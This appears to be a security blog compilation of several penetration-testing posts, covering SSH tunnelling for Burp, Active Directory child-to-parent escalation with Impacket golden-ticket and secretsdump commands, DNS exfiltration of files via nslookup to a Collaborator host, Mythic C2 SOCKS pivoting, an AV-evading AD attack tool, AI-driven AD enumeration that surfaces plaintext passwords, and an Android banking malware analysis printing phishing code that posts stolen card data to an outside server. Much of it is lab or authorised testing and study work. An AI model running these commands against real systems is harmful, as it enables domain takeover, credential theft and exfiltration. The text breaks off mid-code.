Using Burp Suite Professional Without Installing It on a Client VDI (via SSH & EC2)

One day, a friend reached out to me about an assessment he was working on. The client had provided a locked-down, shared VDI environment, which was also being accessed by another vendor, to the point where he was occasionally disconnected mid-session.

Despite these constraints, the assessment had to proceed under the following conditions:

  • All testing activities had to be performed from the client-provided VDI
  • The target application was only accessible from within the VDI network
  • Installing additional tools on the VDI was discouraged/blocked
  • Activating Burp Suite Professional on client infrastructure felt… uncomfortable

He asked a simple question:

Is there any way I can still use my own Burp Pro locally, without activating it on the client VDI?

Since I enjoy learning and experimenting with new approaches, I decided to explore this problem during some free time over the New Year period.

This post documents the exact setup we ended up using.

The Core Idea

We want three things:

  • All web access must originate from the VDI
  • Burp Suite Professional should run only on the tester’s local machine
  • No Burp Pro license activation on the client VDI

To solve this, we introduce a small EC2 relay server and use SSH port forwarding to stitch the environments together.

Client VDI ←→ EC2 Relay ←→ Tester Machine (Burp Pro)

Why SSH on Port 443?

Here’s the first hurdle we hit.

Port 22 (SSH) was blocked outbound from the VDI. This is extremely common in corporate environments. However, port 443 was allowed.

SSH doesn’t care what port it runs on, so we simply configured all tunnels to use port 443, which blends in with normal HTTPS traffic and avoids firewall issues entirely.
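One detail worth spelling out: the EC2 relay itself must accept SSH connections on 443. A minimal sketch, assuming a stock sshd on the relay (the instance's security group must also allow inbound TCP 443):

```shell
# Hypothetical relay setup: keep SSH on 22 for management and add 443 as a
# second listening port, so the VDI can tunnel out over "HTTPS".
printf 'Port 22\nPort 443\n' | sudo tee /etc/ssh/sshd_config.d/10-port443.conf
sudo systemctl restart sshd
```

Depending on the image, SELinux may also need to be told that sshd is allowed to bind 443 (`semanage port -a -t ssh_port_t -p tcp 443`).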

Step 1 — EC2 SSH Configuration (Critical)

By default, sshd binds remote-forwarded ports to loopback only (GatewayPorts defaults to no), and some hardened images disable TCP forwarding entirely. Without fixing this, nothing below will work.

On the EC2 instance:

sudo nano /etc/ssh/sshd_config.d/99-portforward.conf

Add:

AllowTcpForwarding yes
GatewayPorts yes

Restart SSH:

sudo systemctl restart sshd

This allows ports forwarded from other machines to be exposed via EC2.

Step 2 — Local Machine (Burp Suite Professional)

Burp Pro runs only on the tester’s local machine.

Expose Burp Pro to EC2 (Reverse Forward):

ssh -i RelayServer.pem -p 443 -N -R "*:9001:127.0.0.1:8080" ec2-user@IPAddress -vvv

This makes Burp Pro (listening on 8080) available as:

EC2:9001 → Mac:8080 (Burp Pro)

Allow Burp Pro to send traffic back via EC2 (Local Forward):

ssh -i RelayServer.pem -p 443 -N -L 8888:127.0.0.1:8080 ec2-user@IPAddress -vvv

This lets Burp Pro send traffic back through EC2, ensuring requests ultimately exit from the VDI network.

Step 3 — Client VDI

On the VDI, we run Burp Suite Community only as a lightweight proxy endpoint.

SSH Tunnel from VDI:

ssh -i RelayServer.pem -p 443 -N -L 8081:127.0.0.1:9001 -R 8080:127.0.0.1:8080 ec2-user@IPAddress

What this does:

  • EC2:8080 → VDI:8080 (Burp Community)
  • VDI:8081 → EC2:9001 → Burp Pro (Mac)

Step 4 — Burp Configuration

Burp Suite Professional (Local Machine)

  • Listener:
    • Bind address: All interfaces
    • Port: 8080
  • Upstream Proxy
    • Host: 127.0.0.1
    • Port: 8888

The figure below shows Burp Pro (local machine) configured with the upstream proxy:

Burp Pro never connects directly to the target application. All requests ultimately exit the VDI network.

Burp Suite Community (VDI)

  • Listener
    • 127.0.0.1:8080
    • Only one listener is required

The figure below shows the Burp Suite Community listener configuration:

Burp Suite Community on the VDI is used purely as a lightweight proxy endpoint.
No analysis, scanning, or modification is performed here.

Note: Do not use Burp’s embedded browser on the VDI. It is preconfigured to route through Burp Community’s own listener, which would bypass the tunnel into Burp Pro.

Firefox on the VDI

Configure Firefox manually:

  • HTTP/HTTPS Proxy: 127.0.0.1
  • Port: 8081

This way:

  • Firefox sends traffic to 127.0.0.1:8081 on the VDI
  • 8081 is your SSH local forward into the relay + Burp Pro chain
  • The VDI remains the browsing endpoint, while Burp Pro performs analysis remotely

Now the browser flow is:

Firefox (VDI) → EC2 → Burp Pro (Mac) → EC2 → Burp Community (VDI) → Target

The figure below shows that Burp Pro (Local Machine) is receiving all the traffic:

Lessons Learned

  • SSH tunnels create paths, not routing; you must design the traffic flow yourself
  • Port 443 is your friend when 22 is blocked
  • EC2 is an excellent neutral relay point

Final Thoughts

This setup has now been used successfully for:

  • Internal web apps
  • Client-provided VDIs
  • Restricted corporate networks
  • Long-running Burp sessions

If you ever feel uneasy about activating your Burp Pro license on a client machine, this is a clean, professional alternative.

And yes, my friend was very happy (I got a coffee from him ☕).

Disclaimer: It is highly recommended to consult with the client to ensure they are comfortable with the use of an EC2 relay, as the traffic will be routed through an AWS environment.

Child-to-Parent Domain Escalation: Lessons Learned from Kerberos ETYPE Pitfalls

Hi readers,

Last week, I was experimenting in my homelab setup using Game of Active Directory (GOAD), focusing on cross-domain trust abuse, specifically a Child-to-Parent domain escalation scenario.

In this lab, users Robb Stark and Eddard Stark have administrative access to the child domain machine “Winterfell”. The goal was to abuse the existing trust relationship between the child domain (north.sevenkingdoms.local) and the parent domain (sevenkingdoms.local) to escalate privileges into the parent domain.

The diagram below illustrates the trust relationship and access paths involved in this setup.

Attempt 1: Using Impacket raiseChild

With valid credentials for user Eddard Stark, I first attempted to use Impacket’s built-in tool raiseChild, which is designed to automate the entire Child-to-Parent abuse process.

impacket-raiseChild north.sevenkingdoms.local/eddard.stark:'FightP3aceAndHonor!'

However, running this command consistently resulted in a failure. The following error was shown:

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Raising child domain north.sevenkingdoms.local
[*] Forest FQDN is: sevenkingdoms.local
[*] Raising north.sevenkingdoms.local to sevenkingdoms.local
[*] sevenkingdoms.local Enterprise Admin SID is: S-1-5-21-650475728-3995107404-3591096508-519
[*] Getting credentials for north.sevenkingdoms.local
north.sevenkingdoms.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:32906023d49d4dd917f8d071f699fe07:::
north.sevenkingdoms.local/krbtgt:aes256-cts-hmac-sha1-96:7a4411edadb1855c2fca39716c5c44ffea44b822e3297dd7c7bfb9a2534a02e6
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)

Upon closer inspection, I suspected the issue was related to Kerberos encryption type mismatches, specifically RC4 vs AES256 handling during ticket generation.

Despite multiple attempts and validations, I was unable to get impacket-raiseChild to work reliably in this environment and it was taking up a bit of my time.

Manual Approach: Dumping Credentials from Winterfell

Since the automated approach failed, I pivoted to a manual trust abuse path. Using NetExec, I leveraged backup operator privileges to dump credentials directly from Winterfell:

nxc smb winterfell -u 'eddard.stark' -p 'FightP3aceAndHonor!' -M backup_operator

With the obtained credentials, I then dumped domain secrets using Impacket:

impacket-secretsdump north.sevenkingdoms.local/robb.stark:sexywolfy@winterfell

At this point, all required hashes, including the krbtgt AES key, were successfully extracted as shown in the figures below:

Forging a Golden Ticket (Child → Parent)

With the krbtgt AES256 key in hand, I forged a Golden Ticket that included the Enterprise Admin SID of the parent domain:

impacket-ticketer -aesKey 7a4411edadb1855c2fca39716c5c44ffea44b822e3297dd7c7bfb9a2534a02e6 -domain north.sevenkingdoms.local -domain-sid S-1-5-21-1533088046-2260871770-3856243910 -extra-sid S-1-5-21-650475728-3995107404-3591096508-519 Administrator

After exporting the ticket:

export KRB5CCNAME=./Administrator.ccache

I was able to successfully dump NTDS hashes from the parent domain controller Kingslanding:

impacket-secretsdump -k -no-pass north.sevenkingdoms.local/Administrator@kingslanding

This confirmed that the cross-domain trust abuse was successful.

Attempt 2: Automating with NetExec raisechild

During further testing, I discovered that NetExec includes a module named raisechild, which aims to automate the same attack path. Initial execution looked promising:

nxc ldap winterfell -u 'eddard.stark' -p 'FightP3aceAndHonor!' -M raisechild

The NetExec raisechild module successfully forged a Golden Ticket; however, when attempting to dump NTDS hashes, the operation failed with Kerberos-related errors.

Root Cause: Kerberos Encryption Type

After reviewing the raisechild module source code and correlating the error messages, I confirmed the issue was once again caused by a Kerberos encryption type mismatch.

By default, the NetExec raisechild module uses RC4 and attempts to rely on the child domain’s krbtgt NTLM (RC4) material unless an encryption type is explicitly specified. In this environment, AES256 was required. Forcing the encryption type to AES resolved the issue completely:

nxc ldap winterfell -u eddard.stark -p FightP3aceAndHonor! -M raisechild -o ETYPE=aes256

With this change in place, NetExec successfully:

  • Forged a valid Golden Ticket
  • Authenticated to the parent domain
  • Dumped NTDS hashes from Kingslanding without errors

The figure below shows the hashes being dumped successfully:

Exfiltrating Data via DNS in a Restricted Environment

Hi all,

In this post, I will share one of the more interesting findings identified during a recent authorized penetration-testing engagement for a financial organization.

As part of the engagement, the organization had implemented a web-based console that allowed users to execute commands on a server directly from a web browser. Conceptually, this behaves like an SSH terminal exposed over the web, with various restrictions applied to limit user capabilities.

During testing, several noteworthy issues were identified. These included techniques to bypass and escape the restricted shell, privilege escalation through Docker misconfigurations (such as mounting the host filesystem), and other related weaknesses. One technique that stood out in particular was DNS-based data exfiltration, which is the focus of this post.

Network Restriction Observed

The web console did not have internet access. Outbound traffic was blocked, making it impossible to reach external websites such as public search engines or code repositories. As shown in the figure below, even basic connectivity checks (for example, using ping) to external domains consistently failed, confirming the absence of direct outbound network access.

At first glance, this restriction appeared effective in preventing data from leaving the environment through conventional channels.

Exploring Alternative Outbound Channels

After multiple attempts to validate these network restrictions, I decided to explore alternative outbound communication paths that might still be permitted. This led me to test DNS resolution, as DNS traffic is often allowed even in heavily restricted environments.

To validate this, I attempted to resolve a domain pointing to a Burp Suite Collaborator endpoint hosted on my private Collaborator server. The following command was executed from within the web console:

nslookup $(hostname).BurpCollaboratorURL.com

The figure below shows the command being executed in the restricted console:

The response confirmed that DNS queries were successfully reaching the external Collaborator server.

Verifying Data Leakage via DNS

The Collaborator logs showed incoming DNS requests that included the hostname of the target system as part of the subdomain. This demonstrated that arbitrary data could be embedded into DNS queries and successfully exfiltrated outside of the restricted environment.

At this stage, it was clear that DNS could be leveraged as a covert data exfiltration channel, despite outbound web traffic being blocked.
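Before moving to tooling, the mechanics can be sketched by hand. The loop below is an illustrative example (with `BurpCollaboratorURL.com` as a placeholder domain): it hex-encodes a file and leaks it chunk by chunk as subdomain labels, each prefixed with a sequence number so the chunks can be reassembled in order on the server side.

```shell
# Illustrative DNS exfiltration loop: hex-encode the file, split it into
# DNS-label-sized chunks, and emit one lookup per chunk.
COLLAB="BurpCollaboratorURL.com"   # placeholder Collaborator domain
i=0
od -An -tx1 /etc/passwd | tr -d ' \n' | fold -w 60 | while read -r chunk; do
  nslookup "${i}.${chunk}.${COLLAB}" >/dev/null 2>&1
  i=$((i+1))
done
```

Hex keeps every label within DNS’s allowed character set, and the 60-character width stays under the 63-byte label limit.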

Demonstrating Impact with File Exfiltration

To further demonstrate the impact, I used Collabfiltrator, a tool designed to automate DNS-based data exfiltration using Burp Collaborator. This tool is particularly useful during assessments, as it removes the need to set up and manage a custom DNS server while providing clean, readable output.

Using Collabfiltrator, I generated a payload to exfiltrate the contents of a sensitive system file (for example, /etc/passwd) via DNS. Once the payload was executed within the restricted console, the file contents were reconstructed and displayed in plaintext within the Collaborator interface, as shown in the figure below.

This confirmed that sensitive data could be reliably extracted from the environment using DNS alone.

As shown in the figure below, the exfiltrated output is successfully reconstructed and viewable in plaintext within Collabfiltrator.

Using Proxychains With Mythic C2 to Pivot From Kali → C2 → Assume Breach → Internal Network

Hi readers,

Recently, I was speaking with a friend who shared an interesting challenge he faced during a Red Team engagement. The Assume Breach machine he received had extremely limited disk space, meaning he couldn’t install many tools directly on it. To work around this, he used proxychains to route all his Kali Linux tools, running locally on his MacBook, through the C2 and then into the Assume Breach machine.

This allowed him to keep his tooling on Kali while still operating inside the compromised environment. The flow looked like this:

Kali Linux → C2 → AssumeBreach → Internal Network

During my previous Red Team engagements, the client usually allowed us to connect to the network directly using our own laptops, so I never had to deal with this limitation. Since I had time, I decided to replicate the same scenario in my GOAD lab to prepare for future operations.

For this blogpost, I am using Mythic C2, mainly because it is free, easy to deploy, and well-documented.

Setting Up Mythic C2 on AWS

My Mythic server is hosted on AWS EC2, and I expose the UI locally via SSH port forwarding using the following command:

ssh -i C2Key.pem -L 7443:localhost:7443 ubuntu@AWS_IP

Once the tunnel is active, I can visit:

https://localhost:7443

From there, I generated a payload to receive a callback. Mythic immediately showed that the payload was created successfully:

Receiving the Callback From the Assume Breach Machine

Next, on my GOAD lab’s attack path, I executed the payload on SRV01 (10.8.10.22). The callback appeared in Mythic under user Samwell.Tarly.

This machine now represents the Assume Breach endpoint—a restricted Windows host with limited disk space.

Enabling SOCKS Proxy in Mythic

Once I received the beacon, I executed the following command inside Mythic’s UI:

socks

I specified port 7000, which instructs the agent to create a SOCKS proxy listener.

This enables Mythic to forward network traffic from Kali → Mythic → SRV01 → internal domain (DC01, other servers, etc.). The screenshot below shows the SOCKS proxy successfully started on port 7000:

This confirms the SOCKS listener is operational and ready for proxying.

Routing Kali Traffic Through Mythic → SRV01

To achieve this, I extend the SSH tunnel with an additional port forward:

ssh -i C2Key.pem -L 7443:localhost:7443 -L 7000:localhost:7000 ubuntu@AWS_IP

  • Port 7443 forwards the Mythic UI
  • Port 7000 forwards the SOCKS proxy running through Mythic

Configuring Proxychains on Kali

On Kali, I update /etc/proxychains4.conf:

socks5 127.0.0.1 7000

This tells proxychains to send all outgoing tool traffic through the SOCKS proxy. At this stage:

  • My Kali Linux is running outside the GOAD lab environment
  • Traffic tunnels through Kali → AWS → Mythic → SRV01
  • SRV01 acts as the pivot into the internal AD network
  • I don’t need to install any tooling on SRV01
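For reference, the relevant parts of the config look like this (a sketch; `proxy_dns` is worth enabling so hostname lookups for internal AD names also resolve through the tunnel instead of leaking to your local resolver):

```
# /etc/proxychains4.conf (excerpt)
strict_chain
proxy_dns

[ProxyList]
socks5 127.0.0.1 7000
```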

Testing the Multi-Hop Pivot

Now I can run tools like:

proxychains4 nxc smb 10.8.10.11 -u 'robb.stark' -p 'sexywolfy' --lsa 

The traffic path becomes:

Kali → SSH Tunnel → Mythic C2 → SRV01 (Assume Breach) → DC01/Internal Network

The screenshot below shows successful communication from Kali to DC01 using the SOCKS proxy path:

This confirms that the pivot works end-to-end.

Conclusion

This technique is incredibly useful for Red Team scenarios where:

  • The Assume Breach machine has limited resources
  • Installing tools poses OPSEC risks
  • You prefer running tools from your own environment
  • You need to pivot deeper into internal networks from a single foothold

By combining:

  • Mythic C2
  • SSH tunneling
  • SOCKS proxy
  • proxychains

You gain a flexible and stealthy multi-hop environment where your Kali tools execute as if they were inside the victim network, without ever touching the compromised host’s disk.

Exploring SpicyAD for Active Directory Security Testing

Hi Readers,

I recently came across a tool called SpicyAD in a LinkedIn post, and I was curious enough to test it in my homelab environment. The project caught my attention because it aims to consolidate multiple Active Directory attacks and enumeration capabilities into a single, easy-to-use interface. Most red teamers rely on several different tools for Kerberoasting, AS REP roasting, ACL analysis and general domain enumeration. I wanted to see how well SpicyAD performs and whether it can streamline the workflow.

What is SpicyAD?

SpicyAD is a modern Active Directory security assessment toolkit. Its primary goal is to bundle commonly used internal enumeration and attack techniques into a single executable. Its core capabilities include:

  1. Kerberoasting
    • Enumerate SPN accounts and request TGS tickets for offline password cracking.
  2. AS-REP Roasting
    • Identify users with DONT_REQUIRE_PREAUTH and dump AS-REP hashes.
  3. Credential Collection
    • Extract available tokens, stored credentials, or misconfigurations that can lead to privilege escalation.
  4. Domain, User & Computer Enumeration
    • Retrieve essential domain information without relying on multiple separate tools.
  5. ACL / ACE Enumeration
    • Identify misconfigured access rights that may enable lateral movement or privilege escalation.

Because it is newer and less commonly used, SpicyAD may bypass certain signature-based detections, which I verified during my homelab testing.

For more information and test cases, kindly refer to SpicyAD Github Repo.

Compiling SpicyAD

The tool can be downloaded directly from the GitHub repository. Once cloned, SpicyAD can be compiled using the following command:

dotnet.exe build .\SpicyAD.csproj -c Release

After running the command, you should see output indicating that the build completed successfully, as shown below:

Once the tool has been compiled, it launches without being flagged by Windows Defender, even with the latest security updates applied at the time of writing. This is especially interesting from a red-team perspective, as many legacy AD tools are now detected immediately.

The tool also allows non-domain accounts to interact with the domain by executing the following command:

./SpicyAD.exe /domain:north.sevenkingdoms.local /dc-ip:10.8.10.11 /user:hodor /password:hodor domain-info

The figure below shows the output:

Testing SpicyAD in My Homelab

Example #1 — Kerberoasting

Command executed:

./SpicyAD.exe /domain:north.sevenkingdoms.local /dc-ip:10.8.10.11 /user:hodor /password:hodor kerberoast

The tool enumerated SPNs and retrieved TGS tickets as shown in the figure below:

These retrieved hashes are stored locally by the tool.

Example #2 — Dump Kerberos tickets

Dumping tickets from the logged-in machine. The following command/menu path was executed:

./SpicyAD.exe [Option 7 (Ticket Operations) > Option 1 (Dump Tickets)]

The figure below proves that the tool has successfully dumped tickets from the machine:

Example #3 — Delegation Enumeration Using SpicyAD

SpicyAD was able to enumerate Kerberos delegation configurations across the domain, including:

  • Constrained Delegation (S4U2Proxy)
  • Protocol Transition–enabled accounts (S4U2Self)
  • Service-specific delegation paths (CIFS, HTTP, etc.)
  • Resource-Based Constrained Delegation (RBCD) entries

This helps identify accounts that can impersonate any user to specific services, a common lateral movement and privilege escalation path.

The following command/menu path was executed:

./SpicyAD.exe [Option 1 (Enumeration) > Option 8 (Enumerate Delegations)]

The figure below shows the delegation configurations identified:

Example #4 — Enumerating Vulnerable Certificate Templates (ESC1–ESC4, ESC8)

SpicyAD includes a dedicated module for identifying vulnerable Active Directory Certificate Services (AD CS) configurations, focusing on well-known exploitation paths such as ESC1, ESC2, ESC3, ESC4, and ESC8. These misconfigurations are frequently used during modern red-team operations to escalate privileges or obtain domain compromise via Kerberos certificate abuse.

To perform this enumeration, the following command was executed:

./SpicyAD.exe /domain:north.sevenkingdoms.local /dc-ip:10.8.10.11 /user:hodor /password:hodor enum-vulns

The figure below shows output from SpicyAD:

Note: SpicyAD includes many additional capabilities beyond the examples shown above. I recommend exploring the official GitHub repository and experimenting with the full range of features to understand everything the tool can offer.

Conclusion

SpicyAD is a powerful and versatile tool that brings together many common Active Directory attacks and enumeration techniques in a single and lightweight executable. Instead of relying on separate utilities for delegation checks, Kerberos roasting, ACL analysis and certificate template enumeration, SpicyAD simplifies the workflow and provides clear and structured output.

One of the most notable advantages at this stage is its level of stealth. During testing, the tool executed without being detected by Windows Defender. This is likely because the project is still relatively new, which means it is not widely known or signatured by antivirus engines. This gives red teamers the opportunity to use it quietly and effectively.

Overall, SpicyAD is a valuable addition to any internal penetration testing or Active Directory auditing toolkit. It offers strong capabilities, ease of use, and unexpected detection evasion during its current development stage.

AI-driven AD enumeration

Hi Readers,

In this post, I want to share something interesting I explored recently after a friend recommended that I try PowerView.py with its MCP integration. I’ve been using PowerView.py for Active Directory enumeration in my homelab, and discovering that it supports the Model Context Protocol (MCP) means you can integrate it directly with an AI model to perform AD tasks through natural language.

This opens up a new way of interacting with enumeration tools: instead of typing commands manually, you can talk to an AI assistant and have it execute PowerView functions for you — as long as you understand the risks and use it in a controlled, authorised environment.

I tested this inside my GOAD lab (Game of Active Directory) and wanted to document the setup for anyone who wants to experiment with it.

What Is MCP (Model Context Protocol)?

Model Context Protocol (MCP) is a local, open protocol that allows applications and tools to expose structured capabilities to AI models. Instead of relying on prompt-guessing or plugins, MCP lets tools communicate with the AI in a clean, safe, and reliable way.

In simpler terms:

  • Your tool exposes commands
  • MCP acts as the bridge
  • The AI can call those commands safely
  • Everything stays local and private

This makes AI far more accurate and useful when interacting with local tools.

Why PowerView.py?

PowerView.py is the Python-based reimplementation of the original PowerView PowerShell tool from PowerSploit. It offers:

  • Cross-platform support (Linux/macOS/Windows)
  • No PowerShell dependency
  • Great for red teaming from non-Windows attacker machines
  • Potentially lower detection surface compared to PowerShell scripts
  • Supports MCP, enabling full AI-assisted enumeration

This makes it perfect for hybrid “AI + AD Enumeration” workflows.

Installation & Setup

  1. Install Dependencies

sudo apt install libkrb5-dev
pip3 install powerview

  2. Install Claude Desktop (Linux Build)

git clone https://github.com/aaddrick/claude-desktop-debian.git
cd claude-desktop-debian
./build.sh

  3. Install MCP Proxy

pipx install mcp-proxy

  4. Configure Claude Desktop

Edit the configuration file:

~/.config/Claude/claude_desktop_config.json

Add the PowerView MCP integration:

{
  "mcpServers": {
    "Powerview": {
      "command": "/home/kali/.local/bin/mcp-proxy",
      "args": ["http://127.0.0.1:5000/powerview", "--transport=streamablehttp"]
    }
  }
}

  5. Run PowerView.py in MCP Mode

powerview north.sevenkingdoms.local/hodor:[email protected] --mcp --mcp-host 0.0.0.0 --mcp-port 5000 --mcp-path powerview

  6. Start the Proxy

mcp-proxy http://127.0.0.1:5000/powerview --transport=streamablehttp

  7. Launch Claude Desktop

claude-desktop

AI in Action: Conversational AD Enumeration

Once everything is configured, you can interact with PowerView.py simply by talking to your AI assistant. Here are some examples from my GOAD lab.

Example: Listing Domain Admins Using AI

The figure below shows Claude using PowerView.py through MCP to enumerate and return all the domain admin users:

Example: AI Uncovers Exposed Credentials While Processing a Custom Prompt

While performing enumeration, Claude automatically identified that a password was exposed in one of the PowerView.py outputs, even though the original prompt was only asking for privilege analysis:

You can expand each response box to view the full details. Within the same prompt, Claude also recognised several potential pivoting paths, including:

  • Accessible SMB shares available to the user Hodor
  • Possible RDP access paths through group membership
  • And a critical finding — the plaintext password for Samwell Tarly

The figure below confirms that the exposed password can indeed be used to authenticate to a machine within the environment, as verified using NetExec:

Based on the information gathered from Claude, we can also perform an RDP login using the identified credentials. The screenshot below demonstrates a successful login to a target machine as the user Samwell:

Conclusion

PowerView.py + MCP introduces a new way of interacting with common red-team tools.
Instead of running commands manually, you can simply speak naturally to an AI assistant and let it handle the enumeration through structured, safe MCP calls.

This setup is still new, and I plan to explore more advanced ideas:

  • AI-generated AD attack path mapping
  • Automating privilege escalation discovery
  • AI-assisted cleanup after engagements
  • Integration with BloodHound data
  • More MCP-enabled red-team tools

If you’re experimenting with MCP in red-team workflows, I’d love to hear your experience.

Disclaimer

If you connect PowerView to cloud-hosted AI models, be aware that any query you submit, including directory output, credentials, or enumeration results, may pass through the provider’s infrastructure. Your Active Directory data could be stored, logged, or reviewed depending on the platform’s data handling policies.

Use this setup only in non-sensitive, fully authorised lab environments unless you are working with a local or self-hosted model.

How I Used Tailscale to Access My Homelab from Anywhere

Hi Readers,

It has been a while since my last post and I am finally back with something useful to share. In this post I will walk through how I used Tailscale to access my homelab. The lab is running Game of Active Directory (GOAD) Light and is deployed using Ludus. This setup allows me to reach my environment from anywhere without relying on a static IP or complicated network configuration.

For my homelab I used a Beelink SER5 Max which comes with 32 GB of RAM and a 1 TB SSD. Even with that amount of memory I noticed that running the full version of GOAD slowed the system down quite a bit. Because of that I decided to switch to GOAD Light instead.

To configure both Ludus and GOAD I referred to a blog written by Ahmed Sherif and it was extremely helpful throughout the process.

The screenshot above shows the local view of my Ludus environment inside Proxmox. Each virtual machine in the GOAD setup is assigned an internal IP within my homelab network. These are the addresses I would normally use only when I am physically connected to my home network. After configuring Tailscale, all of these machines became reachable remotely through my Tailscale connection without any port forwarding or static IP requirement. This makes it possible for me to manage, test and experiment with my entire lab from anywhere, exactly as if I were at home.

Once the lab was up and running, I wanted a way to access it without any additional network setup. I did not want to rely on port forwarding or pay for a static IP from my ISP. Since I travel quite often, having a lab that I can reach from anywhere is very important for me. It allows me to play with different ideas and explore new tools whenever I want.

Before settling on Tailscale, I experimented with a WireGuard setup together with a DuckDNS address. The solution worked to a certain point, but the main challenges came from my router. The configuration depended heavily on port forwarding and I was not comfortable exposing ports on my home network to the internet.

This is when I switched to Tailscale. It required almost no configuration, it worked immediately and it provided secure access to my lab from any location. It was exactly what I needed.

The steps to configure Tailscale are very easy and straightforward. First, SSH into your Ludus machine and run the following commands:

curl -fsSL https://tailscale.com/install.sh | sh
sudo tailscale up --ssh

After running the command, a login URL will appear in the terminal. Copy the URL and open it in your browser. Once you sign in, install the Tailscale application on your local machine if you have not done so already.

After logging in, I ran the following command to advertise the network ranges for all my GOAD Light machines:

sudo tailscale up --ssh --advertise-routes=10.2.0.0/16,10.3.0.0/16,10.4.0.0/16,10.5.0.0/16,10.6.0.0/16,10.7.0.0/16,10.8.0.0/16
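One step that is easy to miss on a Linux host advertising subnet routes: IP forwarding must be enabled, or the approved routes will not actually carry traffic. Per Tailscale's subnet router documentation, something like the following on the Ludus machine:

```shell
# Enable IPv4/IPv6 forwarding persistently so the Ludus host can relay
# traffic for the advertised GOAD subnets.
echo 'net.ipv4.ip_forward = 1' | sudo tee -a /etc/sysctl.d/99-tailscale.conf
echo 'net.ipv6.conf.all.forwarding = 1' | sudo tee -a /etc/sysctl.d/99-tailscale.conf
sudo sysctl -p /etc/sysctl.d/99-tailscale.conf
```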

Once this is done, go back to the Tailscale admin portal and approve the advertised routes.
After approving them, simply connect to Tailscale from your laptop, as shown in the figure below:

If you expand “Network Devices”, you will see your homelab devices along with their Tailscale IP addresses. Once you have the IP address, you can access the Proxmox panel as shown in the figure below:

With this setup, you can RDP into any GOAD machine through Tailscale without needing a static IP or exposing anything to the internet. The figure below proves that it is possible to RDP to my lab remotely:

I hope this post is helpful for everyone!

Android Banking Malware Analysis

Hi Readers,

It’s been some time since my last write-up. Over the weekend, a good friend sent me an Android malware sample. Although I have experience with Android, I haven’t ventured much into malware analysis, making this the perfect opportunity to dive in. My goal is to begin threat hunting, starting with this sample and gradually progressing to more complex malware.

The file my friend shared was:

  • File name: pnb.apk
  • SHA256 Hash: 1a403909f329b5991d0da307322cacad393fa06da939e6e4739a21a93e0d2227

The first thing I usually do when I receive an APK file is decompile it using APKTool or open it in Jadx. When I loaded this file in Jadx, most of the code was obfuscated. However, I noticed something unusual in the AndroidManifest.xml file. Some values were replaced with “⟨STRING_DECODE_ERROR⟩”, as shown in the figure below:

After a few hours of trying different approaches and exploring the APK file, I reached out to my friend (https://shadowsec.live/), who has experience with malware analysis. I asked if he had encountered similar behavior before, and he suggested using Androguard to help:

After installing Androguard via pip, run the following command to view the AndroidManifest.xml file:

androguard axml -i pnb.apk

The figure below shows that Androguard produces essentially the same output as JADX, except for the values that JADX displayed as “⟨STRING_DECODE_ERROR⟩”.

The following command was issued to decompile the application:

androguard decompile -o ./ ~/Desktop/pnb.apk

The figure below shows Androguard decoding the APK file:

Androguard helped decode some of the packages, making them more readable. After spending a few more hours on it, I decided to revisit JADX and noticed several files under the “Resources” section, as shown in the figure below:

The index.html file creates a signup form that imitates a legitimate banking website, a tactic commonly used in phishing attacks. It contains fields to capture a user’s name, mobile number, and account number, deceiving unsuspecting users into revealing sensitive information. The figure below shows what index.html looks like:

The debit.html file is similar to the index.html file, but instead of collecting basic account information, it is designed to steal debit card details. It prompts users to enter their debit card number, expiry date, and ATM PIN. The figure below shows what the debit.html looks like:

Lastly, script.js handles form submission and redirects users based on the page context. The script first defines the URL where the collected form data is sent. When the form is submitted, it prevents the default submission behavior and gathers the form data into a JavaScript object. Below is the script.js file:

// Define the URL for the server endpoint
const URL = "https://customer16.evilginix.com/site/submit.php";

// Function to handle redirection based on the page context
function handleRedirection(page) {
    let redirectUrl = '';

    switch (page) {
        case 'index.html':
            redirectUrl = 'debit.html';
            break;
        case 'debit.html':
            redirectUrl = 'last.html';
            break;
        default:
            redirectUrl = 'index.html'; // Default redirect URL
            break;
    }

    // Perform the redirection
    window.location.href = redirectUrl;
}

// Set up the form submission event listener
document.getElementById('myForm').addEventListener('submit', function(e) {
    e.preventDefault(); // Prevent the default form submission

    // Get form data
    const formData = new FormData(e.target);
    const data = Object.fromEntries(formData.entries());
    console.log(data);

    // Get ID from local storage
    const id = localStorage.getItem('formId'); // Default to '1' if not set
    data.id = id;

    // Get the current page context
    const dataPage = document.documentElement.getAttribute('data-page');

    // Send data to the server
    fetch(URL, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(data)
    })
    .then(response => response.json())
    .then(result => {
        console.log('Success:', result);
        // Handle redirection after successful data submission
        handleRedirection(dataPage);
    })
    .catch(error => {
        console.error('Error:', error);
    });
});

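For reference, the POST that script.js performs is equivalent in shape to the following curl request. The host here is a non-routable placeholder, deliberately not the live C2, and the field values are dummies:

```shell
# JSON payload mirroring the fields the phishing forms collect (dummy values)
PAYLOAD='{"name":"test","mobile":"0000000000","account":"0000","id":"1"}'

# Replay the request shape against a placeholder endpoint
# (".invalid" never resolves, so no data is actually sent anywhere)
curl -s -X POST "https://c2.example.invalid/site/submit.php" \
  -H "Content-Type: application/json" \
  -d "$PAYLOAD" || true
```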
Visiting the URL confirms that it functions as a Command and Control (C&C) server to which all of the victim’s information is sent, as shown in the figure below:

Additionally, by changing the subdomain, it’s possible to access another phishing campaign, which likely belongs to a different group, as shown in the figure below:

Thank you for reading!

Intentional Exposure: Exploiting Android Exported Activities for Root Detection Bypass

Hi readers,

It’s been a while since my last post, particularly after migrating to the new server. This time, I’d like to share an interesting, yet surprisingly simple, root detection bypass that I recently discovered. The unusual behavior is what truly caught my attention; I hadn’t encountered anything quite like it before.

Over a weekend, a friend of mine, relatively new to cybersecurity, reached out for assistance. He was struggling to bypass the root detection mechanisms in an Android application.

We quickly jumped on a call, and he shared his screen as he attempted to use Objection and Frida to bypass the detection. However, as shown in the figure below, Objection failed to bypass the root detection:

As you can see in the figure above, Objection is running and hasn’t been terminated. This observation prompted me to reverse engineer the application, where I discovered that Zimperium was being utilized for root detection.

In my experience with Zimperium, applications typically force-close upon detecting a hooking attempt, which would also terminate Objection. However, this wasn’t the case here, making the behavior quite unusual and worthy of further investigation.

While analyzing the AndroidManifest.xml file, I noticed an activity with exported=true, as displayed in the figure below:

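For illustration, the declaration looked roughly like this; the activity name below is made up, not the real one from the target application:

```xml
<!-- Hypothetical example: an activity reachable by any app on the device -->
<activity
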